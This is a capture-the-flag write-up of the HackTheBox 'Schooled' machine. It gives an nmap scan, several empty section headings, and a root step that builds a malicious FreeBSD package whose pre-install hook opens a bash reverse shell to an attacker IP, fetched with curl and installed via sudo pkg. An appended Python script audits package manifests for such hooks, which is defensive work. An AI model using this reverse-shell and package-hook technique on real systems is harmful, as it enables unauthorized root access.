HackTheBox — Schooled

Nmap Scan

Nmap scan report for schooled.htb (10.10.10.234)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000

HTTP Enumeration

Escalating Privileges To Teacher

Initial Foothold

Lateral Movement

Getting root

On Attacker Machine

sudo gem install fpm
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF
python3 -m http.server

On Victim Machine

/usr/local/bin/curl http://<attacker-ip>:8000/x-1.0.txz -o x-1.0.txz
sudo pkg install -y --no-repo-update ./x-1.0.txz

On Attacker Machine

TF=$(mktemp -d)
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.13/1337 0>&1"' > $TF/x.sh
fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF

On Victim Machine

/usr/local/bin/curl http://<attacker-ip>:8000/x-1.0.txz -o x-1.0.txz
sudo pkg install -y --no-repo-update ./x-1.0.txz
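The root step above works because pkg(8) runs a package's install hooks as root, and the fpm --before-install option packs the attacker's script into such a hook. The defensive counterpart is to look inside a .txz before it is installed and refuse anything that carries hook scripts. The following Python example is added here and is not part of the original write-up: it opens a pkg(8)-style archive, reads the +MANIFEST, and reports every install/deinstall hook it finds. It assumes the hooks live under the manifest's "scripts" object as JSON (the layout pkg(8) documents); the helper that builds a sample archive is a constructed test fixture, not a real fpm output.

```python
import io
import json
import os
import tarfile
import tempfile

# Hook names pkg(8) will execute as root during install, upgrade or removal.
# Assumed key names for this example; check them against pkg's manifest docs.
SCRIPT_HOOKS = (
    "pre-install", "post-install",
    "pre-deinstall", "post-deinstall",
    "pre-upgrade", "post-upgrade",
)


def read_manifest(pkg_path):
    """Return the parsed +MANIFEST dict from a pkg(8) .txz archive."""
    with tarfile.open(pkg_path, "r:*") as tar:
        for member in tar.getmembers():
            # fpm and pkg may store the entry as '+MANIFEST' or './+MANIFEST'.
            if member.name.split("/")[-1] == "+MANIFEST":
                fh = tar.extractfile(member)
                return json.loads(fh.read().decode("utf-8"))
    raise ValueError("no +MANIFEST in package: %s" % pkg_path)


def package_scripts(pkg_path):
    """Map each install/deinstall hook present in the package to its script body."""
    manifest = read_manifest(pkg_path)
    scripts = manifest.get("scripts") or {}
    return {hook: body for hook, body in scripts.items() if hook in SCRIPT_HOOKS}


def audit_package(pkg_path):
    """Return (ok, findings); ok is False when the package carries any hook script."""
    findings = []
    for hook, body in sorted(package_scripts(pkg_path).items()):
        lines = body.strip().splitlines()
        first = lines[0] if lines else ""
        findings.append("%s: executed as root at install time, begins with %r" % (hook, first))
    return (len(findings) == 0, findings)


def build_sample_package(pkg_path, pre_install=None):
    """Construct a minimal pkg(8)-style .txz for testing (constructed fixture, not a real package)."""
    manifest = {
        "name": "x", "version": "1.0", "origin": "local/x", "comment": "sample",
        "arch": "freebsd:12:*", "prefix": "/usr/local", "files": {},
    }
    if pre_install is not None:
        manifest["scripts"] = {"pre-install": pre_install}
    data = json.dumps(manifest).encode("utf-8")
    with tarfile.open(pkg_path, "w:xz") as tar:
        info = tarfile.TarInfo("+MANIFEST")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return pkg_path


def demo():
    """Audit one clean and one hook-carrying sample package; returns both results."""
    workdir = tempfile.mkdtemp()
    clean = build_sample_package(os.path.join(workdir, "clean-1.0.txz"))
    hooked = build_sample_package(os.path.join(workdir, "x-1.0.txz"),
                                  pre_install="#!/bin/sh\nid\n")
    return audit_package(clean), audit_package(hooked)


if __name__ == "__main__":
    for ok, findings in demo():
        print("OK" if ok else "REJECT", findings)
```

Run against a downloaded x-1.0.txz, audit_package() flags the pre-install hook before sudo pkg install ever executes it; the same check belongs in any sudo rule that lets a non-root user install local package files.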

0xEmbo

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.